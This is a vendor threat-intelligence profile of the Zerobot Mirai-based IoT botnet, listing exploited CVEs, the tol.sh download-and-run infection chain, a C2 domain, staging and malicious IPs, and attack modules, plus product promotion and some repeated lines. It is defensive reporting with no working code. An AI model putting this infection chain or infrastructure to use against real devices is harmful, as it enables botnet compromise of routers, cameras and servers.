Zerobot
Zerobot is a Mirai-based IoT botnet/malware family first documented in 2022 and described in the provided content as having resurfaced in a ninth known iteration, "zerobotv9," in 2026. Earlier reporting referenced Zerobot as Go-based and IoT-focused, while the zerobotv9 variant is described as smaller, not written in Go, UPX-packed, and using encrypted strings. The malware is associated with active exploitation of internet-exposed devices and platforms to propagate, including Hikvision devices via CVE-2021-36260, Tenda AC1206 routers via CVE-2025-7544, and the n8n workflow automation platform via CVE-2025-68613. The content also notes Zerobot has been mentioned alongside newer Mirai forks that added Windows infection capability, but specific Windows functionality for Zerobot itself is not established here.
In the 2026 activity, Akamai observed Zerobot exploiting CVE-2025-68613 and CVE-2025-7544, with activity first detected in January 2026 and dating back to at least early December 2025. After exploitation, victims are instructed to download and execute a shell script named tol.sh from 144.172.100.228. That script copies BusyBox to /tmp, sets execution permissions, and downloads and runs the main multi-architecture payload zerobotv9. The malware hard-codes the C2 domain 0bot.qzz[.]io and uses browser-like user-agent strings to blend malicious traffic with legitimate web activity. The content also states the botnet uses fallback connection techniques including netcat, socat, and Perl socket methods.
Capabilities directly described in the content include Mirai-style botnet behavior and multiple attack modules named TCPXmas, Mixamp, SSH, and Discord. Zerobot is characterized as a Mirai-based botnet campaign targeting exposed networks and connected devices, especially IoT infrastructure such as routers and cameras. The content further states it has also been observed targeting older vulnerabilities including CVE-2017-9841, CVE-2021-3129, and CVE-2022-22947 as additional propagation paths.
Associated infrastructure and indicators explicitly mentioned in the content include the C2 domain 0bot.qzz[.]io, the staging IP 144.172.100.228 hosting tol.sh, and additional malicious IPs recommended for blocking or monitoring: 103.59.160.237, 140.233.190.96, 172.86.123.179, and 216.126.227.101. Zerobot is also explicitly associated in the content with exploitation of CVE-2021-36260, and is mentioned alongside Moobot in that context. Akamai SIRT research is cited as the source for the 2026 Zerobot activity.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
6 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The botnet is likely using CVE-2021-36260 to infect these targets... VulnCheck tracks 23 public exploits for this vulnerability, including a Metasploit module... included in CISA’s Known Exploited Vulnerabilities Catalog (KEV)... actively detected in the Shadow Server and GreyNoise honeypot networks.
Zerobot Exploits Flaws in n8n and Tenda Routers — ... exploiting vulnerabilities in the n8n AI automation platform (CVE-2025-68613) and Tenda routers (CVE-2025-7544) to expand its reach.
Zerobot... observed exploiting vulnerabilities in the n8n AI automation platform (CVE-2025-68613) and Tenda routers (CVE-2025-7544) to expand its reach.
The botnet was further observed targeting CVE-2017-9841, CVE-2021-3129, and CVE-2022-22947, using fallback connection techniques including netcat, socat, and Perl socket methods.
The botnet was further observed targeting CVE-2017-9841, CVE-2021-3129, and CVE-2022-22947, using fallback connection techniques including netcat, socat, and Perl socket methods.
The botnet was further observed targeting CVE-2017-9841, CVE-2021-3129, and CVE-2022-22947, using fallback connection techniques including netcat, socat, and Perl socket methods.
Techniques & procedures
3 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Initial Access
Execution
1 technique
Execution
IOCs tracked for this family
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Other indicator types observed in public reporting.
Recent activity
8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as a newer Mirai fork with added Windows infection capability.
Mirai-derived botnet malware targeting IoT devices and exposed services (notably Tenda AC1206 routers and n8n). It spreads via exploitation of RCE flaws, drops a shell script (tol.sh) to fetch and execute the main multi-architecture payload (zerobotv9), and provides DDoS-style attack capabilities (e.g., TCPXmas, Mixamp) plus additional methods (SSH, Discord).
Mirai-based botnet exploiting vulnerabilities in both traditional IoT (routers) and enterprise-adjacent automation platforms (n8n) to expand infections; may increase organizational risk by enabling compromise of more critical infrastructure.
Mirai-based IoT botnet that propagates by exploiting vulnerabilities (including in n8n and Tenda routers) to compromise devices and expand the botnet footprint.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.